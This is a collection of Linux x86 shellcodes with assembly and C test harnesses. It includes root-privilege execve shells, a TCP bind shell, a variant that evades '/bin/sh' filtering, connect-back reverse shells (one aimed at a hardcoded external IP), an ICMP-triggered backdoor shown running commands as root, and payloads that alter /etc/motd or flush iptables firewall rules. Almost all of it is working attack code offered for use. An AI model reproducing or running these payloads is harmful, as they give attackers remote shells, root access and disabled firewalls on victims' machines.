////////////////////////////////////////// ///Collection of Linux(x86) shellcodes/// ///////////////////////////////////////// writed and modifed by ChoiX ----------------------------------------------------------- 1. Execve() shellcodes ---------------------------- a)Simple shellcode Size:46 byte Description: Makes setreuid(0,0); excave /bin/sh; exit; Code: #include char shellcode[]= // setreuid(0,0); "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xb0\x46" // mov $0x46,%al "\xcd\x80" // int $0x80 // execve /bin/sh "\x31\xc0" // xor %eax,%eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp,%ebx "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx "\x50" // push %eax "\x53" // push %ebx "\x8d\x0c\x24" // lea (%esp,1),%ecx "\xb0\x0b" // mov $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 int main(){ void (*funct) (); (long) funct = &shellcode; funct(); } ---------------------------- b)Simple2 shellcode Size: 32 byte Discription: Simple shellcode which makes setuid(0); excve("/bin/sh",0); Code: /*assamler code __asm__(" xorl %eax,%eax xorl %ebx,%ebx movb $0x17,%al int $0x80 xorl %eax,%eax cdq push %eax pushl $0x68732f6e pushl $0x69622f2f mov %esp, %ebx push %eax push %ebx mov %esp,%ecx movb $0xb, %al int $0x80 ");*/ char main[] = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid(0); */ "\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68" /* execve() of /bin/sh */ "\x68\x2f\x2f\x62\x69\x89\xe3\x50" "\x53\x89\xe1\xb0\x0b\xcd\x80"; ----------------------------------------------------------- 2. Bind shellcodes ----------------------------------------------------------- a)Bind shellcode Size:156 byte Discription: shellcode that binds /bin/sh on port 30464 Code: char shellcode[] = /* fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) */ "\x31\xc0" // xorl %eax,%eax "\x31\xdb" // xorl %ebx,%ebx "\x31\xc9" // xorl %ecx,%ecx "\x31\xd2" // xorl %edx,%edx "\xb0\x66" // movb $0x66,%al "\xb3\x01" // movb $0x1,%bl "\x51" // pushl %ecx "\xb1\x06" // movb $0x6,%cl "\x51" // pushl %ecx "\xb1\x01" // movb $0x1,%cl "\x51" // pushl %ecx "\xb1\x02" // movb $0x2,%cl "\x51" // pushl %ecx "\x8d\x0c\x24" // leal (%esp),%ecx "\xcd\x80" // int $0x80 /* port is 30464 !!! */ /* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */ "\xb3\x02" // movb $0x2,%bl "\xb1\x02" // movb $0x2,%cl "\x31\xc9" // xorl %ecx,%ecx "\x51" // pushl %ecx "\x51" // pushl %ecx "\x51" // pushl %ecx /* port = 0x77, change if needed */ "\x80\xc1\x77" // addb $0x77,%cl "\x66\x51" // pushl %cx "\xb1\x02" // movb $0x2,%cl "\x66\x51" // pushw %cx "\x8d\x0c\x24" // leal (%esp),%ecx "\xb2\x10" // movb $0x10,%dl "\x52" // pushl %edx "\x51" // pushl %ecx "\x50" // pushl %eax "\x8d\x0c\x24" // leal (%esp),%ecx "\x89\xc2" // movl %eax,%edx "\x31\xc0" // xorl %eax,%eax "\xb0\x66" // movb $0x66,%al "\xcd\x80" // int $0x80 /* listen(fd, 1) */ "\xb3\x01" // movb $0x1,%bl "\x53" // pushl %ebx "\x52" // pushl %edx "\x8d\x0c\x24" // leal (%esp),%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x66" // movb $0x66,%al "\x80\xc3\x03" // addb $0x3,%bl "\xcd\x80" // int $0x80 /* cli = accept(fd, 0, 0) */ "\x31\xc0" // xorl %eax,%eax "\x50" // pushl %eax "\x50" // pushl %eax "\x52" // pushl %edx "\x8d\x0c\x24" // leal (%esp),%ecx "\xb3\x05" // movl $0x5,%bl "\xb0\x66" // movl $0x66,%al "\xcd\x80" // int $0x80 /* dup2(cli, 0) */ "\x89\xc3" // movl %eax,%ebx "\x31\xc9" // xorl %ecx,%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 /* dup2(cli, 1) */ "\x41" // inc %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x3f" // movl $0x3f,%al "\xcd\x80" // int $0x80 /* dup2(cli, 2) */ "\x41" // inc %ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x3f" // movb $0x3f,%al "\xcd\x80" // int $0x80 /* execve("//bin/sh", ["//bin/sh", NULL], NULL); */ "\x31\xdb" // xorl %ebx,%ebx "\x53" // pushl %ebx "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f "\x89\xe3" // movl %esp,%ebx "\x8d\x54\x24\x08" // leal 0x8(%esp),%edx "\x31\xc9" // xorl %ecx,%ecx "\x51" // pushl %ecx "\x53" // pushl %ebx "\x8d\x0c\x24" // leal (%esp),%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x0b" // movb $0xb,%al "\xcd\x80" // int $0x80 /* exit(%ebx) */ "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // movb $0x1,%al "\xcd\x80"; // int $0x80 int main(void) { void (*funct)(); (long) funct = &shellcode; funct(); } ---------------------------- b)/bin/sh filtering evading Size:51 byte Discription:??? Code: char shellcode[] = /* setreuid(0,0) 10 */ "\x31\xdb" // xorl %ebx,%ebx "\x31\xc9" // xorl %ecx,%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x46" // movb $0x46,%al "\xcd\x80" // int $0x80 /* execve("//bin/sh", ["//bin/sh", NULL], [NULL]) */ "\x53" // pushl %ebx /* * shifting all "/bin/sh" to left by one, stuff it in %eax, * then shift it to right by one, evading "/bin/sh" filtering !!! */ "\xb8\xdc\x5e\xe6\xd0" // movl $0xd0e65edc,%eax "\xd1\xe8" // shrl %eax "\x50" // pushl %eax "\xb8\x5e\x5e\xc4\xd2" // movl $0xd2c45e5e,%eax "\xd1\xe8" // shrl %eax "\x50" // pushl %eax "\x89\xe3" // movl %esp,%ebx "\x8d\x54\x24\x08" // leal 8(%esp),%edx "\x51" // pushl %ecx "\x53" // pushl %ebx "\x8d\x0c\x24" // leal (%esp),%ecx "\x31\xc0" // xorl %eax,%eax "\xb0\x0b" // movb $0xb,%al "\xcd\x80" // int $0x80 // exit(); "\x31\xc0" // xor %eax,%eax "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 int main(void) { void (*fptr)(); (long) fptr = &shellcode; fptr(); } ----------------------------------------------------------- 4. Connectback shellcodes ----------------------------------------------------------- a)Simple connectback shellcode Size:131 byte Description:shellcode which connect to port 45295(0xb0ef) Code: #include char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" "\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" "\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0" "\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03" "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" "\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89" "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; int c_code() { char *argv[2]; char *sockaddr = "\x02\x00"// Address family "\xef\xb0"// port "\x00\x00\x00\x00"// sin_addr "\x00\x00\x00\x00" "\x00\x00\x00\x00"; int sock; sock = socket(2, 1, 6); if (connect(sock, sockaddr, 16) < 0) exit(); dup2(sock, 0); dup2(sock, 1); dup2(sock, 2); argv[0] = "//bin/sh"; argv[1] = NULL; execve(argv[0], &argv[0], NULL); exit(); } int asm_code() { __asm("# sock = socket(2, 1, 6); xorl %eax,%eax xorl%ebx, %ebx xorl %ecx,%ecx pushl%ecx movb$6,%cl# IPPROTO_TCP pushl%ecx movb$1,%cl# SOCK_STREAM pushl%ecx movb$2,%cl# AF_INET pushl %ecx movl %esp,%ecx movb $1, %bl# SYS_SOCKET movb $102, %al# SYS_socketcall int $0x80 # connect(sock, sockaddr, 16) movl%eax, %edx xorl %eax,%eax xorl%ecx,%ecx pushl%ecx pushl %ecx pushl $0x44434241# ip address pushw$0xefb0# port movb$0x02,%cl# address family pushw%cx movl%esp,%edi movb$16,%bl# sizeof(sockaddr) pushl%ebx pushl %edi pushl%edx# sock movl%esp,%ecx movb $3, %bl # SYS_CONNECT movb $102, %al# SYS_socketcall int$0x80 xorl %ecx,%ecx cmpl%eax,%ecx je CONNECTED # exit() xorl%eax,%eax movb$1,%al# SYS_exit int$0x80 CONNECTED: # dup2(sock, 0); xorl %eax,%eax movb $63,%al# SYS_dup2 movl%edx,%ebx# sock int $0x80 # dup2(sock, 1); xorl %eax, %eax movb $63, %al # SYS_dup2 movl %edx, %ebx # sock movb$1,%cl# stdout int $0x80 # dup2(sock, 2); xorl %eax, %eax movb $63, %al # SYS_dup2 movl %edx, %ebx # sock movb $2, %cl# stderr int $0x80 # execve(argv[0], &argv[0], NULL); xorl %eax,%eax xorl%edx,%edx pushl%eax pushl $0x68732f6e# the string pushl $0x69622f2f# //bin/sh movl%esp, %ebx pushl%eax pushl%ebx movl%esp,%ecx movb$11,%al# SYS_execve int $0x80 # exit() xorl %eax, %eax movb $1, %al # SYS_exit int $0x80 "); } int main() { void (*funct)(); shellcode[33] = 81;/* ip of www.netric.org :) */ shellcode[34] = 17; shellcode[35] = 46; shellcode[36] = 156; (long) funct = &shellcode; funct(); return 0; } ---------------------------- b)forking connectback shellcode Size:102 bytes Discription: shellcode that forking connect to port 39321 Code: #include #include #include #define IP"\x0a\x00\x00\x02"/* 10.0.0.2 */ #define PORT"\x99\x99"/* 39321 */ char shellcode[] = "\x31\xc0"/* xorl %eax,%eax */ "\xb0\x02"/* movb $0x2,%al*/ "\xcd\x80"/* int $0x80 [fork()]*/ "\x31\xdb"/* xorl %ebx,%ebx*/ "\x39\xd8"/* cmpl %ebx,%eax*/ "\x75\x54"/* jne 0x54*/ "\x50"/* push %eax*/ "\x40"/* incl %eax*/ "\x50"/* push %eax*/ "\x40"/* incl %eax*/ "\x50"/* push %eax*/ "\x89\xe1"/* movl %esp,%ecx*/ "\x43"/* incl %ebx*/ "\xb0\x66"/* movb $0x66,%al*/ "\xcd\x80"/* int $0x80 [socket()]*/ "\x4b"/* decl %ebx*/ "\x53"/* push %ebx*/ "\x53"/* push %ebx*/ "\x68"IP/* push IP*/ "\x66\x68"PORT/* pushw PORT*/ "\xb3\x02"/* movb $0x2,%bl*/ "\x66\x53"/* pushw %bx*/ "\x89\xe2"/* movl %esp,%edx*/ "\xb3\x10"/* movb $0x10,%bl*/ "\x53"/* push %ebx*/ "\x52"/* push %edx*/ "\x50"/* push %eax*/ "\x89\xe1"/* movl %esp,%ecx*/ "\xb3\x03"/* movb $0x3,%bl*/ "\xb0\x66"/* movb $0x66,%al*/ "\xcd\x80"/* int $0x80 [connect()]*/ "\x31\xc9"/* xorl %ecx,%ecx*/ "\x39\xc1"/* cmpl %eax,%ecx*/ "\x75\x23"/* jne 0x23*/ "\x58"/* popl %eax*/ "\xb1\x02"/* movb $0x2,%cl*/ "\xb0\x3f"/* movb $0x3f,%al*/ "\xcd\x80"/* int $0x80 [dup2()]*/ "\x49"/* decl %ecx*/ "\x75\xf9"/* jnz -0x7*/ "\xb0\x3f"/* movb $0x3f,%al*/ "\xcd\x80"/* int $0x80 [dup2()]*/ "\x50"/* push %eax*/ "\x68\x2f\x2f\x73\x68"/* push '//sh'*/ "\x68\x2f\x62\x69\x6e"/* push '/bin'*/ "\x89\xe3"/* movl %esp,%ebx*/ "\x50"/* push %eax*/ "\x53"/* push %ebx*/ "\x89\xe1"/* movl %esp,%ecx*/ "\x99"/* cdq*/ "\xb0\x0b"/* movb $0x0b,%al*/ "\xcd\x80"/* int $0x80 [execve()]*/ "\x31\xc0"/* xorl %eax,%eax*/ "\x40"/* incl %eax*/ "\xcd\x80";/* int $0x80*/ void asm_code() { asm (" xorl %eax,%eax movb $0x2,%al int $0x80# [fork] xorl %ebx,%ebx cmp %ebx,%eax jne HOU_OP_MET_DAT_GESODERMIETER push %eax incl %eax push %eax incl %eax push %eax movl %esp,%ecx incl %ebx movb $0x66,%al int $0x80# [socket] decl %ebx push %ebx push %ebx push $0x0200000a pushw $0x9999 movb $0x2,%bl pushw %bx movl %esp,%edx movb $0x10,%bl push %ebx push %edx push %eax movl %esp,%ecx movb $0x3,%bl movb $0x66,%al int $0x80# [connect] xorl %ecx,%ecx cmpl %eax,%ecx jne HOU_OP_MET_DAT_GESODERMIETER movb $0x2,%cl DUPLOOP: movb $0x3f, %al int $0x80# [dup2] decl %ecx jnz DUPLOOP movb $0x3f, %al int $0x80# [dup2] push %eax push $0x68732f6e push $0x69622f2f movl %esp,%ebx push %eax push %ebx movl %esp,%ecx cdq movb $0xb,%al int $0x80# [execve] HOU_OP_MET_DAT_GESODERMIETER: xorl %eax,%eax incl %eax int $0x80# [exit] "); } void c_code() { int fd,i; char *prog[] = {"/bin/sh",NULL}; char *them = "\x02\x00" "\x99\x99" /* PORT 0x9999 = 39321 */ "\x0a\x00\x00\x02" /* IP 10.0.0.2 */ "\x00\x00\x00\x00" "\x00\x00\x00\x00"; if (!fork()) { fd = socket(2,1,0); connect(fd,(struct sockaddr *)them,16); for (i = 0; i < 2; i++) dup2(fd,i); execve(prog[0],prog,NULL); } } int main() { int (*a)(); a = (int (*)())shellcode; printf("shellcode size = %d\n\n",sizeof(shellcode)); a(); return 0; } ----------------------------------------------------------- 3. ICMP bind shellcodes ----------------------------------------------------------- a)Simple icmp bind shellcode Size: 137 byte Description: example of using [/home/choix/codes/shellcodes/icmp# ping -p 992f7573722f62696e2f69643e6f7574 -1 -s 26 localhost PATTERN: 0x992f7573722f62696e2f69643e6f7574 (\x99/usr/bin/id>out) 34 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.5 ms [/home/choix/codes/shellcodes/icmp]# cat out uid=0(root) gid=0(root) groups=0(root) Code: #include #include #include #include #define SECRET_CHAR"\x99" char shell[] = "\x31\xc0\x31\xdb\x31\xc9\xb0\x66" "\x43\x41\x51\xb1\x03\x51\x49\x51" "\x89\xe1\xcd\x80\x89\xc2\xb0\x02" "\xcd\x80\x31\xdb\x39\xc3\x75\x55" "\x31\xc0\x31\xdb\xb0\x10\x50\xb0" "\xff\x54\x54\x53\x50\x55\x52\x89" "\xe1\xb0\x66\xb3\x0c\xcd\x80\x89" "\xe9\x01\xc1\x31\xc0\x88\x41\xfe" "\xb0\x25\x01\xc5\xb0" SECRET_CHAR "\x32\x45\xff\x75\xd5\xb0\x02\xcd" "\x80\x31\xdb\x39\xc3\x74\x25\xeb" "\xc9\x31\xc0\x31\xdb\xb3\x02\xb0" "\x06\xcd\x80\x5b\x89\xd9\x88\x43" "\x07\x80\xc1\x08\x50\x55\x51\x53" "\x89\xe1\x99\xb0\x0b\xcd\x80\x31" "\xc0\x40\xcd\x80\xe8\xd8\xff\xff" "\xff" "/bin/sh -c"; void asm_code() { __asm(" xorl %eax,%eax xorl %ebx,%ebx xorl %ecx,%ecx movb $0x66,%al incl %ebx incl %ecx push %ecx movb $0x3,%cl push %ecx decl %ecx push %ecx movl %esp,%ecx int $0x80/* socket(); */ movl %eax,%edx movb $0x2,%al int $0x80/* fork(); */ xorl %ebx,%ebx cmpl %eax,%ebx jne exit endlessloop: xorl %eax,%eax xorl %ebx,%ebx movb $0x10,%al push %eax movb $0xff,%al push %esp push %esp push %ebx push %eax push %ebp push %edx movl %esp,%ecx movb $0x66,%al movb $0x0c,%bl int $0x80/* recvfrom(); */ movl %ebp,%ecx addl %eax,%ecx xorl %eax,%eax movb %al,-2(%ecx) movb $0x25,%al addl %eax,%ebp movb $0x99,%al/* SECRET_CHAR */ xorb -1(%ebp),%al jnz endlessloop movb $0x2,%al int $0x80/* fork(); */ xorl %ebx,%ebx cmpl %eax,%ebx je stack jmp endlessloop execve: xorl %eax,%eax xorl %ebx,%ebx movb $0x2,%bl movb $0x6,%al int $0x80/* close(); */ pop %ebx movl %ebx,%ecx movb %al,0x7(%ebx) addb $0x8,%cl push %eax push %ebp push %ecx push %ebx movl %esp,%ecx cdq movb $0xb,%al int $0x80/* execve(); */ exit: xorl %eax,%eax incl %eax int $0x80/* exit(); */ stack: call execve .string \"/bin/sh -c\" "); } void c_code() { int fd; int nb = 0; struct sockaddr_in them; int them_size = sizeof(struct sockaddr); char buf[256]; char *prog[] = {"/bin/sh","-c",&buf[37],NULL}; fd = socket(2,3,1); if (fork() > 0) exit(0); while (1) { while (!(nb = recvfrom(fd,buf,255,0,(struct sockaddr *)&them,&them_size))); buf[nb-1] = 0; if (buf[36] == (char)SECRET_CHAR) if (fork() == 0) { close(2); execve(prog[0],prog,NULL); } } } int main(int c,char *v[]) { void (*i)(); i = (void (*)())shell; fprintf(stderr,"Size of shellcode = %d\n\n",strlen(shell)); i(); return 0; } ----------------------------------------------------------- 4. Other shellcodes ----------------------------------------------------------- a)fun 1 shellcode Size: 77 byte Discription: shellcode writes “unl0ck rulez!!!” in /etc/motd Code: char shellcode[] = /*fd = open("/etc////motd", O_WRONLY | O_APPEND); */ "\x31\xc0" // xorl %eax,%eax "\x31\xc9" // xorl %ecx,%ecx "\xb0\x05" // movb $0x5,%al "\x66\xb9\x01\x04" // movw $0x401,%cx "\x31\xd2" // xorl %edx,%edx "\x52" // pushl %edx "\x68\x6d\x6f\x74\x64" // pushl $0x64746f6d "\x68\x2f\x2f\x2f\x2f" // pushl $0x2f2f2f2f "\x68\x2f\x65\x74\x63" // pushl $0x6374652f "\x8d\x1c\x24" // leal (%esp),%ebx "\xcd\x80" // int $0x80 /* write(fd, "unl0ck rulez!!!\n",16); */ "\x89\xc3" // movl %eax,%ebx "\x31\xc0" // xorl %eax,%eax "\xb2\x10" // movb $0x10,%dl "\xb0\x04" // movb $0x4,%al "\x51" // pushl %ecx "\x68\x21\x21\x21\x0a" // pushl $0x0a212121 "\x68\x75\x6c\x65\x7a" // pushl $0x7a656c75 "\x68\x63\x6b\x20\x72" // pushl $0x72206b69 "\x68\x75\x6e\x6c\x30" // pushl $0x306c6e75 "\x8d\x0c\x24" // leal (%esp),%ecx "\xcd\x80" // int $0x80 /* exit(%ebx) */ "\x31\xc0" // xorl %eax,%eax "\xb0\x01" // movb $0x1,%al "\xcd\x80"; // int $0x80 int main(void) { void (*funct) (); (long) funct = &shellcode; printf("strlen(shellcode): %u\n", strlen(shellcode)); funct(); ---------------------------- b)fun2 shellcode Size:36 byte Description: shellcode writes “unl0ck was here” in stdout Code: #include char shellcode[]= // write(stdout,"unl0ck was here\n", 16); "\x31\xc0" // xor %eax,%eax "\x31\xdb" // xor %ebx,%ebx "\x31\xd2" // xor %edx,%edx "\x68\x65\x72\x65\x0a" // push $0xa657265 "\x68\x61\x73\x20\x68" // push $0x68207361 "\x68\x63\x6b\x20\x77" // push $0x77206b63 "\x68\x75\x6e\x6c\x30" // push $0x306c6e75 "\x89\xe1" // mov %esp,%ecx "\xb2\x10" // mov $0x10,%dl "\x43"// inc %ebx "\xb0\x04" // mov $0x4,%al "\xcd\x80" // int $0x80 "\x31\xc0" // xor %eax,%eax // exit; "\xb0\x01" // mov $0x1,%al "\xcd\x80"; // int $0x80 int main() { void (*funct) (); (long) funct = &shellcode; funct(); } ---------------------------- c)”flush” shellcode Size: 61 byte Description: shellcode that makes /sbin/iptables –flush Code: char main[] = "\x31\xc0\x31\xdb\xb0\x02\xcd\x80" "\x39\xd8\x75\x2d\x31\xc0\x50\x66" "\x68\x2d\x46\x89\xe6\x50\x68\x62" "\x6c\x65\x73\x68\x69\x70\x74\x61" "\x68\x62\x69\x6e\x2f\x68\x2f\x2f" "\x2f\x73\x89\xe3\x8d\x54\x24\x10" "\x50\x56\x54\x89\xe1\xb0\x0b\xcd" "\x80\x89\xc3\x31\xc0\x31\xc9\x31" "\xd2\xb0\x07\xcd\x80"; /* your evil shellcode here */ int asm_code() { __asm(" xorl %eax,%eax xorl %ebx,%ebx movb $2, %al int $0x080 cmpl %ebx,%eax jne WAIT xorl %eax,%eax pushl %eax pushw $0x462d movl %esp,%esi pushl %eax pushl $0x73656c62 pushl $0x61747069 pushl $0x2f6e6962 pushl $0x732f2f2f movl %esp,%ebx leal 0x10(%esp),%edx pushl %eax pushl %esi pushl %esp movl %esp,%ecx movb $0xb,%al int $0x80 WAIT: movl %eax, %ebx xorl %eax, %eax xorl %ecx, %ecx xorl %edx, %edx movb $7, %al int $0x80 "); }